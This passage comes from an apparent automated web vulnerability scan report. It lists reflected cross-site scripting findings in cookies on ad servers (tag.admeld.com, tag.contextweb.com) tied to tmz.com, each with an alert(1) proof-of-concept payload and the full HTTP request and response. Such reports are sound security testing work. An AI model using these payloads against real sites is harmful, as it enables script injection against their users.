<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=63e2c778-f3e1-4d02-8ee2-261dfa64843dc556c"><script>alert(1)</script>521fef51a86&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843dc556c">
...[SNIP]...

1.285. http://tag.admeld.com/ad/iframe/221/tmz/300x250/tremor-300x250 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/300x250/tremor-300x250

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21799"><script>alert(1)</script>26c994d99d was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/221/tmz/300x250/tremor-300x250?t=1300831445909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2Fsignin%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signin/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843d21799"><script>alert(1)</script>26c994d99d; D41U=3neZURdpqdwqeL6TvOZ4lCJ-xdkcbEl9uqP_nBl1mlktEZOzu-6D2NQ

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjIxLCAgc2l0ZTogICAgICAgICAidG16IiwgIGFkOiAgICAgICAgICAgMjg3ODE3MCwgIG5ldHdvcms6ICAgICAgInRyZW1vciIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiYmZiNmUwZDQtZDI5ZC00NmI2LWExMTItNTMyZThiODNkMDFkIiwgIHVzZXI6ICAgICAgICAgIjYzZTJjNzc4LWYzZTEtNGQwMi04ZWUyLTI2MWRmYTY0ODQzZDIxNzk5Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+MjZjOTk0ZDk5ZCIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAidHJlbW9yLTMwMHgyNTAiLCAgZGl2OiAgICAgICAgICAiYmZiNmUwZDQtZDI5ZC00NmI2LWExMTItNTMyZThiODNkMDFkIiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cudG16LmNvbS9zaWduaW4vIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgNDQsICBhY2NvdW50X2lkOiAgIDczMDI1LCAgbmV0d29ya19uYW1lOiAiVHJlbW9yIE1lZGlhIChUTVopIiwgIHB1Ymxpc2hlcl9uYW1lOiAidG16IiwgIGVjcG06ICAgICAgICAgIjIuMDAiLCAgZmVjcG06ICAgICAgICAiMi4wMCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAidHJlbW9yLTMwMHgyNTAiLCAgcnVsZTogICAgICAgICAidHJlbW9yLTMwMHgyNTAiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxNDA3MTEsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMDI3MzQsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNTg4OTUsICJidXkiOjEyNDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiWEEubmV0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjYyMTI0LCAiYnV5IjoyMDM2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkFjdWl0eSBBZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTAxMjY1LCAiYnV5Ijo1MjEwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRXFhZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxNzEzOTg2LCAiYnV5Ijo0MjUxLCJscCI6Imh0dHA6Ly93d3cuZXFhZHMuY29tLyIsImFuIjoiIiwic3RhdHVzIjoiMC4yMCIsImZpZCI6NDA3LCAiZmNwbSI6IjAuMjUifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMzgifQ==
Content-Length: 2396
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:29 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d21799"><script>alert(1)</script>26c994d99d&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.286. http://tag.admeld.com/ad/iframe/221/tmz/728x90/tremor-728x90 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/728x90/tremor-728x90

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db731"><script>alert(1)</script>e7e5df2c24c was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/221/tmz/728x90/tremor-728x90?t=1300831432633&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2Ftips&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843ddb731"><script>alert(1)</script>e7e5df2c24c; D41U=3neZURdpqdwqeL6TvOZ4lCJ-xdkcbEl9uqP_nBl1mlktEZOzu-6D2NQ

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjIxLCAgc2l0ZTogICAgICAgICAidG16IiwgIGFkOiAgICAgICAgICAgMjc3NjYzNiwgIG5ldHdvcms6ICAgICAgInRyZW1vciIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS0xIiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI4MDFiZTRiYy1iNjllLTQ5YjAtODczYy0yZTE4ZWRlODcwMjMiLCAgdXNlcjogICAgICAgICAiNjNlMmM3NzgtZjNlMS00ZDAyLThlZTItMjYxZGZhNjQ4NDNkZGI3MzEiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5lN2U1ZGYyYzI0YyIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAidHJlbW9yLTcyOHg5MCIsICBkaXY6ICAgICAgICAgICI4MDFiZTRiYy1iNjllLTQ5YjAtODczYy0yZTE4ZWRlODcwMjMiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy50bXouY29tL3RpcHMiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICA0NCwgIGFjY291bnRfaWQ6ICAgNzMwMjUsICBuZXR3b3JrX25hbWU6ICJUcmVtb3IgTWVkaWEgKFRNWikiLCAgcHVibGlzaGVyX25hbWU6ICJ0bXoiLCAgZWNwbTogICAgICAgICAiMi4wMCIsICBmZWNwbTogICAgICAgICIyLjAwIiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJ0cmVtb3ItNzI4eDkwIiwgIHJ1bGU6ICAgICAgICAgInRyZW1vci03Mjh4OTAiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxNDA3NzgsICJidXkiOjE3OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMDI3NjYsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNTg5NTMsICJidXkiOjEyNDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiWEEubmV0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjYyMTczLCAiYnV5IjoyMDM3LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkFjdWl0eSBBZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo0MTA0NjY1LCAiYnV5Ijo1MjA5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTcxNTk3MSwgImJ1eSI6NDI1MiwibHAiOiJodHRwOi8vd3d3LmVxYWRzLmNvbSIsImFuIjoiIiwic3RhdHVzIjoiMC4yMCIsImZpZCI6NDA3LCAiZmNwbSI6IjAuMjUifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMzQifQ==
Content-Length: 2398
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:03:54 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843ddb731"><script>alert(1)</script>e7e5df2c24c&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.287. http://tag.admeld.com/ad/iframe/221/tmz/728x90/tremor-728x90 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/728x90/tremor-728x90

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22dd7"><script>alert(1)</script>65e4b9852df was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/221/tmz/728x90/tremor-728x90?t=1300831432633&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2Ftips&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843d22dd7"><script>alert(1)</script>65e4b9852df; D41U=3neZURdpqdwqeL6TvOZ4lCJ-xdkcbEl9uqP_nBl1mlktEZOzu-6D2NQ

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjIxLCAgc2l0ZTogICAgICAgICAidG16IiwgIGFkOiAgICAgICAgICAgMjc3NjYzNiwgIG5ldHdvcms6ICAgICAgInRyZW1vciIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS0xIiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICIyOWM2MDU0NC1hZGEwLTQzMTgtODBmNC0xYzQ1MGQ3ZmEzYmMiLCAgdXNlcjogICAgICAgICAiNjNlMmM3NzgtZjNlMS00ZDAyLThlZTItMjYxZGZhNjQ4NDNkMjJkZDciPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD42NWU0Yjk4NTJkZiIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAidHJlbW9yLTcyOHg5MCIsICBkaXY6ICAgICAgICAgICIyOWM2MDU0NC1hZGEwLTQzMTgtODBmNC0xYzQ1MGQ3ZmEzYmMiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy50bXouY29tL3RpcHMiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICA0NCwgIGFjY291bnRfaWQ6ICAgNzMwMjUsICBuZXR3b3JrX25hbWU6ICJUcmVtb3IgTWVkaWEgKFRNWikiLCAgcHVibGlzaGVyX25hbWU6ICJ0bXoiLCAgZWNwbTogICAgICAgICAiMi4wMCIsICBmZWNwbTogICAgICAgICIyLjAwIiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJ0cmVtb3ItNzI4eDkwIiwgIHJ1bGU6ICAgICAgICAgInRyZW1vci03Mjh4OTAiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxNDA3NzgsICJidXkiOjE3OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMDI3NjYsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNTg5NTMsICJidXkiOjEyNDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiWEEubmV0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjYyMTczLCAiYnV5IjoyMDM3LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkFjdWl0eSBBZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo0MTA0NjY1LCAiYnV5Ijo1MjA5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTcxNTk3MSwgImJ1eSI6NDI1MiwibHAiOiJodHRwOi8vd3d3LmVxYWRzLmNvbSIsImFuIjoiIiwic3RhdHVzIjoiMC4yMCIsImZpZCI6NDA3LCAiZmNwbSI6IjAuMjUifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMjYifQ==
Content-Length: 2398
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:03:54 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=63e2c778-f3e1-4d02-8ee2-261dfa64843d22dd7"><script>alert(1)</script>65e4b9852df&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d22dd7">
...[SNIP]...

1.288. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb536'%3balert(1)//420ec22301d was submitted in the V cookie. This input was echoed as cb536';alert(1)//420ec22301d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&ca=VIEWAD&cp=529848&ct=88083&cf=300X250&cn=1&rq=1&dw=1058&cwu=http%3A%2F%2Fwww.tmz.com%2Ftips&mrnd=92900210&if=0&tl=1&pxy=692,398&cxy=1042,308&dxy=1042,308&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSRcb536'%3balert(1)//420ec22301d; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5; C2W4=3TQwcI7gaOg8elrf0zppGQ5W8-kjh6AzvbIlXPAjnP9LEy1n0VWmaZA; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB20
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2592
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:16 GMT
Connection: close
Set-Cookie: V=GlchrMbA1MSRcb536'%3balert(1)//420ec22301d; domain=.contextweb.com; expires=Thu, 22-Mar-2012 22:04:16 GMT; path=/
Set-Cookie: 529848_3_88083=1300831456938; domain=.contextweb.com; path=/
Set-Cookie: cr=15|1|-8589001706285389434|1; domain=.contextweb.com; expires=Fri, 16-Mar-2012 22:04:16 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 23-Mar-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/221/tmz/300x250/8/meld.js"></scr'+'ipt>\n'
+ '\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.c
...[SNIP]...
<img src="http://tags.bluekai.com/site/3358?id=GlchrMbA1MSRcb536';alert(1)//420ec22301d" height="1" width="1" />
...[SNIP]...

1.289. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beab4'-alert(1)-'2f2493da65d was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&ca=VIEWAD&cp=529848&ct=88083&cf=300X250&cn=1&rq=1&dw=1058&cwu=http%3A%2F%2Fwww.tmz.com%2Ftips&mrnd=92900210&if=0&tl=1&pxy=692,398&cxy=1042,308&dxy=1042,308&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5beab4'-alert(1)-'2f2493da65d; C2W4=3TQwcI7gaOg8elrf0zppGQ5W8-kjh6AzvbIlXPAjnP9LEy1n0VWmaZA; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3038
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:18 GMT
Connection: close
Set-Cookie: V=GlchrMbA1MSR; domain=.contextweb.com; expires=Thu, 22-Mar-2012 22:04:18 GMT; path=/
Set-Cookie: 529848_3_88083=1300831458534; domain=.contextweb.com; path=/
